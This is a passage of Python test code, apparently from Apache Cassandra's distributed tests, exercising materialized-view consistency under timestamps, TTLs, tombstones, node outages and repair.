    assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
    assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
    # remove unselected, view row should be removed
    self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET f=null WHERE k=1 AND c=1;", flush)
    assert_none(session, "SELECT * FROM t")
    assert_none(session, "SELECT * FROM mv")
    # add selected with ts=7, view row is alive
    self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET b=1 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, None, 1, None, None])
    assert_one(session, "SELECT * FROM mv", [1, 1, None, 1])
    # remove selected with ts=7, view row is dead
    self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET b=null WHERE k=1 AND c=1;", flush)
    assert_none(session, "SELECT * FROM t")
    assert_none(session, "SELECT * FROM mv")
    # add selected with ts=5, view row is alive (selected column should not affects each other)
    self.update_view(session, "UPDATE t USING TIMESTAMP 5 SET a=1 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
    assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
    # add selected with ttl=20 (we apparently need a long ttl because the flushing etc that self.update_view does can take a long time)
    self.update_view(session, "UPDATE t USING TTL 20 SET a=1 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
    assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
    time.sleep(20)
    # update unselected with TTL 20, view row should be alive while the cell lives
    self.update_view(session, "UPDATE t USING TTL 20 SET f=1 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
    assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
    time.sleep(20)
    # once the TTL'd unselected cell expires, base and view rows are both gone
    assert_none(session, "SELECT * FROM t")
    assert_none(session, "SELECT * FROM mv")
@since('3.0')
def test_base_column_in_view_pk_complex_timestamp_with_flush(self):
    """Run the base-column-in-view-PK timestamp scenario with flushes."""
    self._test_base_column_in_view_pk_complex_timestamp(flush=True)
@since('3.0')
def test_base_column_in_view_pk_complex_timestamp_without_flush(self):
    """Run the base-column-in-view-PK timestamp scenario without flushes."""
    self._test_base_column_in_view_pk_complex_timestamp(flush=False)
def _test_base_column_in_view_pk_complex_timestamp(self, flush):
    """
    Able to shadow old view row with column ts greater than pk's ts and re-insert the view row
    Able to shadow old view row with column ts smaller than pk's ts and re-insert the view row
    @jira_ticket CASSANDRA-11500

    :param flush: when True, flush between updates so each write lands in its
        own sstable.
    """
    session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
    node1, node2, node3 = self.cluster.nodelist()
    session.execute('USE ks')
    # 'a' is a regular base column promoted into the view primary key
    session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int)")
    session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
                     "WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
    session.cluster.control_connection.wait_for_schema_agreement()
    # Set initial values TS=1
    self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1) USING TIMESTAMP 1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, 1])
    assert_one(session, "SELECT * FROM mv", [1, 1, 1])
    # increase b ts to 10
    self.update_view(session, "UPDATE t USING TIMESTAMP 10 SET b = 2 WHERE k = 1;", flush)
    assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
    assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
    # switch entries. shadow a = 1, insert a = 2
    self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET a = 2 WHERE k = 1;", flush)
    assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 2, 2, 10])
    assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 2, 10])
    # switch entries. shadow a = 2, insert a = 1
    self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET a = 1 WHERE k = 1;", flush)
    assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
    assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
    # switch entries. shadow a = 1, insert a = 2
    self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET a = 2 WHERE k = 1;", flush, compact=True)
    assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 2, 2, 10])
    assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 2, 10])
    # able to shadow view row even if base-column in view pk's ts is smaller than row timestamp
    # set row TS = 20, a@6, b@20
    self.update_view(session, "DELETE FROM t USING TIMESTAMP 5 where k = 1;", flush)
    assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, None, 2, 10])
    assert_none(session, "SELECT k,a,b,writetime(b) FROM mv")
    self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1) USING TIMESTAMP 6;", flush)
    assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
    assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
    self.update_view(session, "INSERT INTO t (k, b) VALUES (1, 1) USING TIMESTAMP 20;", flush)
    assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 1, 20])
    assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 1, 20])
    # switch entries. shadow a = 1, insert a = 2
    self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET a = 2 WHERE k = 1;", flush)
    assert_one(session, "SELECT k,a,b,writetime(a),writetime(b) FROM t", [1, 2, 1, 7, 20])
    assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 1, 20])
    # switch entries. shadow a = 2, insert a = 1
    self.update_view(session, "UPDATE t USING TIMESTAMP 8 SET a = 1 WHERE k = 1;", flush)
    assert_one(session, "SELECT k,a,b,writetime(a),writetime(b) FROM t", [1, 1, 1, 8, 20])
    assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 1, 20])
    # create another view row
    self.update_view(session, "INSERT INTO t (k, a, b) VALUES (2, 2, 2);", flush)
    assert_one(session, "SELECT k,a,b FROM t WHERE k = 2", [2, 2, 2])
    assert_one(session, "SELECT k,a,b FROM mv WHERE k = 2", [2, 2, 2])
    # stop node2, node3
    logger.debug('Shutdown node2')
    node2.stop(wait_other_notice=True)
    logger.debug('Shutdown node3')
    node3.stop(wait_other_notice=True)
    # shadow a = 1, create a = 2
    query = SimpleStatement("UPDATE t USING TIMESTAMP 9 SET a = 2 WHERE k = 1", consistency_level=ConsistencyLevel.ONE)
    self.update_view(session, query, flush)
    # shadow (a=2, k=2) after 3 second
    query = SimpleStatement("UPDATE t USING TTL 3 SET a = 2 WHERE k = 2", consistency_level=ConsistencyLevel.ONE)
    self.update_view(session, query, flush)
    logger.debug('Starting node2')
    node2.start(wait_for_binary_proto=True)
    logger.debug('Starting node3')
    node3.start(wait_for_binary_proto=True)
    # For k = 1 & a = 1, We should get a digest mismatch of tombstones and repaired
    query = SimpleStatement("SELECT * FROM mv WHERE k = 1 AND a = 1", consistency_level=ConsistencyLevel.ALL)
    result = session.execute(query, trace=True)
    self.check_trace_events(result.get_query_trace(), True)
    assert 0 == len(result.current_rows)
    # For k = 1 & a = 1, second time no digest mismatch
    result = session.execute(query, trace=True)
    self.check_trace_events(result.get_query_trace(), False)
    assert_none(session, "SELECT * FROM mv WHERE k = 1 AND a = 1")
    assert 0 == len(result.current_rows)
    # For k = 1 & a = 2, We should get a digest mismatch of data and repaired for a = 2
    query = SimpleStatement("SELECT * FROM mv WHERE k = 1 AND a = 2", consistency_level=ConsistencyLevel.ALL)
    result = session.execute(query, trace=True)
    self.check_trace_events(result.get_query_trace(), True)
    assert 1 == len(result.current_rows)
    # For k = 1 & a = 2, second time no digest mismatch
    result = session.execute(query, trace=True)
    self.check_trace_events(result.get_query_trace(), False)
    assert 1 == len(result.current_rows)
    assert_one(session, "SELECT k,a,b,writetime(b) FROM mv WHERE k = 1", [1, 2, 1, 20])
    # wait for the TTL 3 write on (k=2, a=2) to expire
    time.sleep(3)
    # For k = 2 & a = 2, We should get a digest mismatch of expired and repaired
    query = SimpleStatement("SELECT * FROM mv WHERE k = 2 AND a = 2", consistency_level=ConsistencyLevel.ALL)
    result = session.execute(query, trace=True)
    self.check_trace_events(result.get_query_trace(), True)
    logger.debug(result.current_rows)
    assert 0 == len(result.current_rows)
    # For k = 2 & a = 2, second time no digest mismatch
    result = session.execute(query, trace=True)
    self.check_trace_events(result.get_query_trace(), False)
    assert 0 == len(result.current_rows)
@since('3.0')
def test_expired_liveness_with_limit_rf1_nodes1(self):
    """Expired-liveness LIMIT handling on a single node with RF=1."""
    self._test_expired_liveness_with_limit(rf=1, nodes=1)
@since('3.0')
def test_expired_liveness_with_limit_rf1_nodes3(self):
    """Expired-liveness LIMIT handling on three nodes with RF=1."""
    self._test_expired_liveness_with_limit(rf=1, nodes=3)
@since('3.0')
def test_expired_liveness_with_limit_rf3(self):
    """Expired-liveness LIMIT handling on three nodes with RF=3."""
    self._test_expired_liveness_with_limit(rf=3, nodes=3)
def _test_expired_liveness_with_limit(self, rf, nodes):
    """
    Test MV with expired liveness limit is properly handled
    @jira_ticket CASSANDRA-13883

    :param rf: replication factor for the keyspace
    :param nodes: cluster size
    """
    session = self.prepare(rf=rf, nodes=nodes, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
    node1 = self.cluster.nodelist()[0]
    session.execute('USE ks')
    session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int)")
    session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
                     "WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
    session.cluster.control_connection.wait_for_schema_agreement()
    for k in range(100):
        session.execute("INSERT INTO t (k, a, b) VALUES ({}, {}, {})".format(k, k, k))
    # generate view row with expired liveness except for row 50 and 99
    # (deleting 'a', the view PK column, marks the view row with expired liveness)
    for k in range(100):
        if k == 50 or k == 99:
            continue
        session.execute("DELETE a FROM t where k = {};".format(k))
    # there should be 2 live data
    assert_one(session, "SELECT k,a,b FROM mv limit 1", [50, 50, 50])
    assert_all(session, "SELECT k,a,b FROM mv limit 2", [[50, 50, 50], [99, 99, 99]])
    assert_all(session, "SELECT k,a,b FROM mv", [[50, 50, 50], [99, 99, 99]])
    # verify IN
    keys = range(100)
    assert_one(session, "SELECT k,a,b FROM mv WHERE k in ({}) limit 1".format(', '.join(str(x) for x in keys)),
               [50, 50, 50])
    assert_all(session, "SELECT k,a,b FROM mv WHERE k in ({}) limit 2".format(', '.join(str(x) for x in keys)),
               [[50, 50, 50], [99, 99, 99]])
    assert_all(session, "SELECT k,a,b FROM mv WHERE k in ({})".format(', '.join(str(x) for x in keys)),
               [[50, 50, 50], [99, 99, 99]])
    # verify fetch size
    # force page-by-page iteration so paging must also skip expired rows
    session.default_fetch_size = 1
    assert_one(session, "SELECT k,a,b FROM mv limit 1", [50, 50, 50])
    assert_all(session, "SELECT k,a,b FROM mv limit 2", [[50, 50, 50], [99, 99, 99]])
    assert_all(session, "SELECT k,a,b FROM mv", [[50, 50, 50], [99, 99, 99]])
@since('3.0')
def test_base_column_in_view_pk_commutative_tombstone_with_flush(self):
    """Run the commutative-tombstone scenario with flushes enabled."""
    self._test_base_column_in_view_pk_commutative_tombstone_(flush=True)
@since('3.0')
def test_base_column_in_view_pk_commutative_tombstone_without_flush(self):
    """Run the commutative-tombstone scenario without flushes."""
    self._test_base_column_in_view_pk_commutative_tombstone_(flush=False)
def _test_base_column_in_view_pk_commutative_tombstone_(self, flush):
    """
    view row deletion should be commutative with newer view livenessInfo, otherwise deleted columns may be resurrected.
    @jira_ticket CASSANDRA-13409

    :param flush: when True, flush after each update so each write lands in
        its own sstable (autocompaction is disabled below to keep them apart).
    """
    session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
    node1 = self.cluster.nodelist()[0]
    session.execute('USE ks')
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
    session.cluster.control_connection.wait_for_schema_agreement()
    # keep each flushed write in a separate sstable
    for node in self.cluster.nodelist():
        node.nodetool("disableautocompaction")
    # sstable 1, Set initial values TS=1
    self.update_view(session, "INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 1", flush)
    assert_one(session, "SELECT * FROM t_by_v", [1, 1, 'a', 3.0])
    # sstable 2, change v's value and TS=2, tombstones v=1 and adds v=0 record
    self.update_view(session, "DELETE FROM t USING TIMESTAMP 2 WHERE id = 1;", flush)
    assert_none(session, "SELECT * FROM t_by_v")
    assert_none(session, "SELECT * FROM t")
    # sstable 3, tombstones of mv created by base deletion should remain.
    self.update_view(session, "INSERT INTO t (id, v) VALUES (1, 1) USING TIMESTAMP 3", flush)
    assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
    assert_one(session, "SELECT * FROM t", [1, 1, None, None])
    # sstable 4, shadow view row (id=1, v=1), insert (id=1, v=2, ts=4)
    self.update_view(session, "UPDATE t USING TIMESTAMP 4 set v = 2 WHERE id = 1;", flush)
    assert_one(session, "SELECT * FROM t_by_v", [2, 1, None, None])
    assert_one(session, "SELECT * FROM t", [1, 2, None, None])
    # sstable 5, shadow view row (id=1, v=2), insert (id=1, v=1 ts=5)
    self.update_view(session, "UPDATE t USING TIMESTAMP 5 set v = 1 WHERE id = 1;", flush)
    assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
    assert_one(session, "SELECT * FROM t", [1, 1, None, None])  # data deleted by row-tombstone@2 should not resurrect
    if flush:
        self.cluster.compact()
        assert_one(session, "SELECT * FROM t_by_v", [1, 1, None, None])
        assert_one(session, "SELECT * FROM t", [1, 1, None, None])  # data deleted by row-tombstone@2 should not resurrect
    # shadow view row (id=1, v=1)
    self.update_view(session, "UPDATE t USING TIMESTAMP 5 set v = null WHERE id = 1;", flush)
    assert_none(session, "SELECT * FROM t_by_v")
    assert_one(session, "SELECT * FROM t", [1, None, None, None])
def test_view_tombstone(self):
    """
    Test that a materialized views properly tombstone
    @jira_ticket CASSANDRA-10261
    @jira_ticket CASSANDRA-10910
    """
    self.prepare(rf=3, options={'hinted_handoff_enabled': False})
    node1, node2, node3 = self.cluster.nodelist()
    session = self.patient_exclusive_cql_connection(node1)
    # tracing on a busy cluster can be slow; allow up to 2 minutes
    session.max_trace_wait = 120
    session.execute('USE ks')
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v,id)"))
    session.cluster.control_connection.wait_for_schema_agreement()
    # Set initial values TS=0, verify
    session.execute(SimpleStatement("INSERT INTO t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0) USING TIMESTAMP 0",
                                    consistency_level=ConsistencyLevel.ALL))
    self._replay_batchlogs()
    assert_one(
        session,
        "SELECT * FROM t_by_v WHERE v = 1",
        [1, 1, 'a', 3.0]
    )
    session.execute(SimpleStatement("INSERT INTO t (id, v2) VALUES (1, 'b') USING TIMESTAMP 1",
                                    consistency_level=ConsistencyLevel.ALL))
    self._replay_batchlogs()
    assert_one(
        session,
        "SELECT * FROM t_by_v WHERE v = 1",
        [1, 1, 'b', 3.0]
    )
    # change v's value and TS=3, tombstones v=1 and adds v=0 record
    session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 3 SET v = 0 WHERE id = 1",
                                    consistency_level=ConsistencyLevel.ALL))
    self._replay_batchlogs()
    assert_none(session, "SELECT * FROM t_by_v WHERE v = 1")
    logger.debug('Shutdown node2')
    node2.stop(wait_other_notice=True)
    # node2 misses this write; its replica still holds the v=1 tombstone
    session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 4 SET v = 1 WHERE id = 1",
                                    consistency_level=ConsistencyLevel.QUORUM))
    self._replay_batchlogs()
    assert_one(
        session,
        "SELECT * FROM t_by_v WHERE v = 1",
        [1, 1, 'b', 3.0]
    )
    node2.start(wait_for_binary_proto=True)
    # We should get a digest mismatch
    query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1",
                            consistency_level=ConsistencyLevel.ALL)
    result = session.execute(query, trace=True)
    self.check_trace_events(result.get_query_trace(), True)
    # We should not get a digest mismatch the second time
    query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1", consistency_level=ConsistencyLevel.ALL)
    result = session.execute(query, trace=True)
    self.check_trace_events(result.get_query_trace(), False)
    # Verify values one last time
    assert_one(
        session,
        "SELECT * FROM t_by_v WHERE v = 1",
        [1, 1, 'b', 3.0],
        cl=ConsistencyLevel.ALL
    )
def check_trace_events(self, trace, expect_digest):
    """
    Assert the presence (or absence) of a digest-mismatch event in *trace*.

    Matches both message layouts:
      4.0+  "Digest mismatch: Mismatch for key DecoratedKey..."
      <4.0  "Digest mismatch: org.apache.cassandra.service.DigestMismatchException: Mismatch for key DecoratedKey..."

    :param trace: query trace whose ``events`` are scanned
    :param expect_digest: True if a digest mismatch must be present,
        False if it must be absent; fails the test otherwise.
    """
    regex = r"Digest mismatch: ([a-zA-Z.]+:\s)?Mismatch for key DecoratedKey"
    found = any(re.match(regex, event.description) for event in trace.events)
    if found and not expect_digest:
        self.fail("Encountered digest mismatch when we shouldn't")
    if expect_digest and not found:
        self.fail("Didn't find digest mismatch")
def test_simple_repair_by_base(self):
    """Simple repair scenario, repairing only the base table."""
    self._simple_repair_test(repair_base=True)
def test_simple_repair_by_view(self):
    """Simple repair scenario, repairing only the materialized view."""
    self._simple_repair_test(repair_view=True)
def _simple_repair_test(self, repair_base=False, repair_view=False):
    """
    Test that a materialized view are consistent after a simple repair.

    Writes 1000 rows while node2 is down, verifies the MV is readable at
    CL=ONE but unavailable at CL=ALL, then restarts node2, repairs the base
    table and/or the view (per the flags), and checks that CL=ALL reads
    succeed with the expected rows and no digest mismatch.

    :param repair_base: repair the base table 't' after node2 restarts
    :param repair_view: repair the view 't_by_v' after node2 restarts
    """
    session = self.prepare(rf=3, options={'hinted_handoff_enabled': False})
    node1, node2, node3 = self.cluster.nodelist()
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
    session.cluster.control_connection.wait_for_schema_agreement()
    logger.debug('Shutdown node2')
    node2.stop(wait_other_notice=True)
    # node2 misses all of these writes (hints are disabled)
    for i in range(1000):
        session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
    self._replay_batchlogs()
    logger.debug('Verify the data in the MV with CL=ONE')
    for i in range(1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0]
        )
    logger.debug('Verify the data in the MV with CL=ALL. All should be unavailable.')
    for i in range(1000):
        statement = SimpleStatement(
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            consistency_level=ConsistencyLevel.ALL
        )
        assert_unavailable(
            session.execute,
            statement
        )
    logger.debug('Start node2, and repair')
    node2.start(wait_for_binary_proto=True)
    if repair_base:
        node1.nodetool("repair ks t")
    if repair_view:
        node1.nodetool("repair ks t_by_v")
    logger.debug('Verify the data in the MV with CL=ALL. All should be available now and no digest mismatch')
    for i in range(1000):
        query = SimpleStatement(
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            consistency_level=ConsistencyLevel.ALL
        )
        result = session.execute(query, trace=True)
        self.check_trace_events(result.get_query_trace(), False)
        # Fixed: the original `assert x, [[i, i, 'a' == 3.0]]` never compared
        # anything — the list was just the assert *message* (and contained the
        # typo `'a' == 3.0`). Compare the returned rows to the expected row.
        assert self._rows_to_list(result.current_rows) == [[i, i, 'a', 3.0]]
def test_base_replica_repair(self):
    """Base-replica repair scenario without MV lock contention."""
    self._base_replica_repair_test()
def test_base_replica_repair_with_contention(self):
    """
    Test repair does not fail when there is MV lock contention
    @jira_ticket CASSANDRA-12905
    """
    fail_mv_lock = True
    self._base_replica_repair_test(fail_mv_lock=fail_mv_lock)
def _base_replica_repair_test(self, fail_mv_lock=False):
    """
    Test that a materialized view are consistent after the repair of the base replica.

    :param fail_mv_lock: when True, restart node1 with
        cassandra.test.fail_mv_locks_count set so MV lock acquisition fails,
        exercising repair under lock contention (CASSANDRA-12905).
    """
    self.prepare(rf=3)
    node1, node2, node3 = self.cluster.nodelist()
    session = self.patient_exclusive_cql_connection(node1)
    session.execute('USE ks')
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
    session.cluster.control_connection.wait_for_schema_agreement()
    logger.debug('Write initial data')
    for i in range(1000):
        session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
    self._replay_batchlogs()
    logger.debug('Verify the data in the MV with CL=ALL')
    for i in range(1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0],
            cl=ConsistencyLevel.ALL
        )
    logger.debug('Shutdown node1')
    node1.stop(wait_other_notice=True)
    logger.debug('Delete node1 data')
    # wipe node1 entirely so repair must rebuild its base replica from scratch
    node1.clear(clear_all=True)
    jvm_args = []
    if fail_mv_lock:
        if self.cluster.version() >= LooseVersion('3.10'):  # CASSANDRA-10134
            jvm_args = ['-Dcassandra.allow_unsafe_replace=true', '-Dcassandra.replace_address={}'.format(node1.address())]
        jvm_args.append("-Dcassandra.test.fail_mv_locks_count=1000")
        # this should not make Keyspace.apply throw WTE on failure to acquire lock
        node1.set_configuration_options(values={'write_request_timeout_in_ms': 100})
    logger.debug('Restarting node1 with jvm_args={}'.format(jvm_args))
    node1.start(wait_for_binary_proto=True, jvm_args=jvm_args)
    logger.debug('Shutdown node2 and node3')
    node2.stop(wait_other_notice=True)
    node3.stop(wait_other_notice=True)
    session = self.patient_exclusive_cql_connection(node1)
    session.execute('USE ks')
    logger.debug('Verify that there is no data on node1')
    for i in range(1000):
        assert_none(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i)
        )
    logger.debug('Restarting node2 and node3')
    node2.start(wait_for_binary_proto=True)
    node3.start(wait_for_binary_proto=True)
    # Just repair the base replica
    logger.debug('Starting repair on node1')
    node1.nodetool("repair ks t")
    logger.debug('Verify data with cl=ALL')
    for i in range(1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0]
        )
@pytest.mark.resource_intensive
def test_complex_repair(self):
    """
    Test that a materialized view are consistent after a more complex repair.

    Writes one dataset to {node1, node4, node5} while {node2, node3} are
    down, then an overlapping dataset to {node2, node3} while the others
    are down, lets batchlogs expire, and verifies that a global repair
    reconciles the two generations of data in the view.
    """
    session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
    node1, node2, node3, node4, node5 = self.cluster.nodelist()
    # we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
    session.execute("CREATE TABLE ks.t (id int PRIMARY KEY, v int, v2 text, v3 decimal)"
                    "WITH gc_grace_seconds = 5")
    session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
    session.cluster.control_connection.wait_for_schema_agreement()
    logger.debug('Shutdown node2 and node3')
    node2.stop()
    node3.stop(wait_other_notice=True)
    logger.debug('Write initial data to node1 (will be replicated to node4 and node5)')
    for i in range(1000):
        session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
    logger.debug('Verify the data in the MV on node1 with CL=ONE')
    for i in range(1000):
        assert_one(
            session,
            "SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0]
        )
    logger.debug('Close connection to node1')
    session.cluster.shutdown()
    logger.debug('Shutdown node1, node4 and node5')
    node1.stop()
    node4.stop()
    node5.stop()
    logger.debug('Start nodes 2 and 3')
    node2.start()
    node3.start(wait_for_binary_proto=True)
    session2 = self.patient_cql_connection(node2)
    logger.debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
    for i in range(1000):
        assert_none(
            session2,
            "SELECT * FROM ks.t_by_v WHERE v = {}".format(i)
        )
    logger.debug('Write new data in node2 and node3 that overlap those in node1, node4 and node5')
    for i in range(1000):
        # we write i*2 as value, instead of i
        session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i * 2))
    logger.debug('Verify the new data in the MV on node2 with CL=ONE')
    for i in range(1000):
        v = i * 2
        assert_one(
            session2,
            "SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
            [v, v, 'a', 3.0]
        )
    logger.debug('Wait for batchlogs to expire from node2 and node3')
    # matches the gc_grace_seconds=5 set on the base table above
    time.sleep(5)
    logger.debug('Start remaining nodes')
    node1.start(wait_for_binary_proto=True)
    node4.start(wait_for_binary_proto=True)
    node5.start(wait_for_binary_proto=True)
    session = self.patient_cql_connection(node1)
    logger.debug('Read data from MV at QUORUM (old data should be returned)')
    for i in range(1000):
        assert_one(
            session,
            "SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0],
            cl=ConsistencyLevel.QUORUM
        )
    logger.debug('Run global repair on node1')
    node1.repair()
    logger.debug('Read data from MV at quorum (new data should be returned after repair)')
    for i in range(1000):
        v = i * 2
        assert_one(
            session,
            "SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
            [v, v, 'a', 3.0],
            cl=ConsistencyLevel.QUORUM
        )
@pytest.mark.resource_intensive
def test_throttled_partition_update(self):
    """
    @jira_ticket: CASSANDRA-13299, test break up large partition when repairing base with mv.
    Provide a configurable batch size (cassandra.mv.mutation.row.count=100) to throttle the
    number of rows to be applied in one mutation.
    """
    # 5 nodes, RF=5, hints disabled so only repair can reconcile the replicas.
    session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
    node1, node2, node3, node4, node5 = self.cluster.nodelist()
    for node in self.cluster.nodelist():
        node.nodetool("disableautocompaction")
    session.execute("CREATE TABLE ks.t (pk int, ck1 int, ck2 int, v1 int, v2 int, PRIMARY KEY(pk, ck1, ck2))")
    session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
                     "WHERE pk IS NOT NULL AND ck1 IS NOT NULL AND ck2 IS NOT NULL "
                     "PRIMARY KEY (pk, ck2, ck1)"))
    session.cluster.control_connection.wait_for_schema_agreement()

    logger.debug('Shutdown node2 and node3')
    node2.stop(wait_other_notice=True)
    node3.stop(wait_other_notice=True)

    size = 50
    range_deletion_ts = 30
    partition_deletion_ts = 10

    # Build one large partition (pk=1) while node2/node3 are down, using ck1 as the
    # write timestamp so the later tombstone timestamps (10/30/50/60/70) interleave with it.
    for ck1 in range(size):
        for ck2 in range(size):
            session.execute("INSERT INTO ks.t (pk, ck1, ck2, v1, v2)"
                            " VALUES (1, {}, {}, {}, {}) USING TIMESTAMP {}".format(ck1, ck2, ck1, ck2, ck1))
    self._replay_batchlogs()
    for ck1 in range(size):
        for ck2 in range(size):
            assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2),
                       [1, ck1, ck2, ck1, ck2])
            assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2),
                       [1, ck1, ck2, ck1, ck2])

    logger.debug('Shutdown node4 and node5')
    node4.stop(wait_other_notice=True)
    node5.stop(wait_other_notice=True)

    # Layer every tombstone flavour on top; only node1 sees these deletes.
    for ck1 in range(size):
        for ck2 in range(size):
            if ck1 % 2 == 0:  # range tombstone
                session.execute("DELETE FROM ks.t USING TIMESTAMP 50 WHERE pk=1 AND ck1={}".format(ck1))
            elif ck1 == ck2:  # row tombstone
                session.execute("DELETE FROM ks.t USING TIMESTAMP 60 WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2))
            elif ck1 == ck2 - 1:  # cell tombstone
                session.execute("DELETE v2 FROM ks.t USING TIMESTAMP 70 WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2))

    # range deletion
    session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1 and ck1 < 30 and ck1 > 20".format(range_deletion_ts))
    session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1 and ck1 = 20 and ck2 < 10".format(range_deletion_ts))

    # partition deletion for ck1 <= partition_deletion_ts
    session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1".format(partition_deletion_ts))
    # only partition deletion for the pk=2000
    session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=2000".format(partition_deletion_ts))
    self._replay_batchlogs()

    # start nodes with different batch size so each node exercises a different
    # mutation_repair_rows_per_batch throttle during repair
    logger.debug('Starting nodes')
